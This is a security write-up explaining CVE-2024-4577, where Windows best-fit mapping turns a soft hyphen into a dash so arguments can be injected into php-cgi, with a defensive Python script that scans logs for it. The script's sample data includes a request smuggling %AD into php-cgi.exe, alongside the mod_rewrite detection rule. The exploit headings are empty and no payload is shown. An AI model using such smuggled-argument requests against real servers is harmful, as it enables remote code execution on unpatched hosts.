PHP CGI RCE (CVE-2024-4577)
The PHP programming language, during its design, neglected the Best-Fit character encoding conversion feature inherent in Windows operating systems. This oversight allows unauthenticated attackers to bypass protections from the old CVE-2012-1823 by using specific character sequences to perform attacks such as parameter injection, subsequently executing arbitrary code on remote PHP servers.
Scope of Impact
This vulnerability affects all PHP versions installed on Windows operating systems. For detailed information, refer to the table below:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
How to Determine if You Are Vulnerable to Attack?
For common setups involving the Apache HTTP Server combined with PHP, website administrators can confirm whether their server is vulnerable using the two methods listed in this article. Notably, Scenario Two is also the default setting during the installation of XAMPP for Windows, implying that all versions of XAMPP for Windows are inherently affected by this vulnerability.
At the time of writing this article, it has been verified that unauthorized attackers can execute arbitrary code on remote servers running Windows operating systems in the following language environments:
Traditional Chinese (Code page 950)
Simplified Chinese (Code page 936)
Japanese (Code page 932)
For Windows systems running in other locales (English, Korean, Western European and others), the extensive use of PHP makes it impossible to comprehensively list and rule out every exploitable scenario, so users are still advised to thoroughly inventory their assets, verify their usage scenarios, and update PHP to the latest version to ensure maximum security.
Evil Soft Hyphen
A soft hyphen (represented in HTML as &shy;) is an invisible character used to indicate an optional hyphenation point within a line of text. In web development, the soft hyphen is often used in long words or URLs to allow for automatic line breaks at the edge of the display without altering the actual content or meaning of the text.
What is the Common Gateway Interface?
The Common Gateway Interface (CGI) is a standard protocol that defines how web servers can interact with executable programs installed on a server that generate web pages dynamically. Such programs are called CGI scripts; they can be written in any programming language, including PHP.
In the context of PHP and web development, CGI acts as a bridge between the PHP script and the web server, allowing the server to pass data, like form inputs or request details, to the PHP script. The PHP script processes this data and sends back the generated HTML (or other data types) to the server, which then sends it to the client's browser.
Example:
Query strings are parsed and passed to the PHP interpreter on the command line - a request such as http://host/cgi.php?foo=bar
might be executed as php.exe -cgi.php foo=bar
So what?
Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?
One of them contains a soft hyphen (0xAD) and the other a regular dash (0x2D).
While they both appear the same to you and me, they have vastly different meanings to the OS.
Best fit mapping
PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.
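As an added defender-side example (not code from the original article), the following Python script scans constructed Apache access log lines for the 0xAD soft-hyphen byte at the start of a percent-decoded query string, which is the same condition the vendor-recommended mod_rewrite mitigation (RewriteCond %{QUERY_STRING} ^%ad [NC]) rejects. The log format, sample lines and verdict names are assumptions made for the example.

```python
"""Flag CVE-2024-4577-style query strings in web server access logs.

Added example; not code from the original article. Assumes Apache/XAMPP
"common" log format and uses constructed sample lines. The strict check
mirrors the vendor-recommended mod_rewrite mitigation (reject query strings
that start with %AD); a weaker heuristic flags 0xAD elsewhere for review.
"""
import re
from urllib.parse import unquote_to_bytes

SOFT_HYPHEN = 0xAD  # byte that php-cgi.exe best-fit maps to '-' on affected Windows locales
HYPHEN = 0x2D       # a real ASCII '-'

# Matches the request line inside an Apache "common"/"combined" log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def query_bytes(target: str) -> bytes:
    """Percent-decode the query string of a request target to raw bytes.

    Decoding to bytes (not str) matters: the single byte 0xAD is what the
    CGI handler hands to php-cgi.exe, so that is what we must inspect.
    """
    if "?" not in target:
        return b""
    return unquote_to_bytes(target.split("?", 1)[1])


def classify(target: str) -> str:
    """Return a verdict for one request target."""
    qs = query_bytes(target)
    if not qs:
        return "ok"
    if qs[0] == SOFT_HYPHEN:
        # Same condition as the mitigation rule: RewriteCond %{QUERY_STRING} ^%ad [NC]
        return "soft-hyphen-leading"
    if SOFT_HYPHEN in qs:
        # 0xAD inside a value can be legitimate Latin-1 data; review, do not block blindly.
        return "soft-hyphen-inside"
    return "ok"


def scan_log(lines):
    """Return (line_number, verdict, target) for every suspicious request line."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify(m.group("target"))
        if verdict != "ok":
            findings.append((n, verdict, m.group("target")))
    return findings


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Jun/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [07/Jun/2024:10:00:02 +0000] "POST /cgi-bin/php-cgi.exe?%ADx HTTP/1.1" 200 64',
    '10.0.0.7 - - [07/Jun/2024:10:00:03 +0000] "GET /index.php?name=Jos%E9 HTTP/1.1" 200 300',
    '10.0.0.8 - - [07/Jun/2024:10:00:04 +0000] "GET /search.php?q=foo%ADbar HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for n, verdict, target in scan_log(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {target}")
```

Run it against your own access log by replacing SAMPLE_LOG with the file's lines. The leading-byte check is the one to alert on; hits inside a value deserve a look but often turn out to be Latin-1 text, which is why the script separates the two verdicts instead of blocking on any 0xAD.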
Scenario One: Setting PHP to run under CGI mode
In the Apache Httpd configuration file, when HTTP requests are directed to the PHP-CGI executable using the Action directive, this setup is affected by the vulnerability. Common configurations include, but are not limited to:
or
Scenario Two: Exposing the PHP executable to the public (Default installation setting in XAMPP)
Even if PHP is not configured to run under CGI mode, simply exposing the PHP executable in the CGI directory also subjects it to this vulnerability. Common situations include, but are not limited to:
Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.
Exposing the PHP installation directory externally through ScriptAlias, such as:
Different type of EXP
EXP 1
SSRF
EXP 2
EXP 3
Demo
Interview Question
1) Why are XAMPP installations the most affected by this CVE?
2) What is best-fit mapping, and how does it cause this vulnerability?
3) Which setting do you have to modify to fix this issue?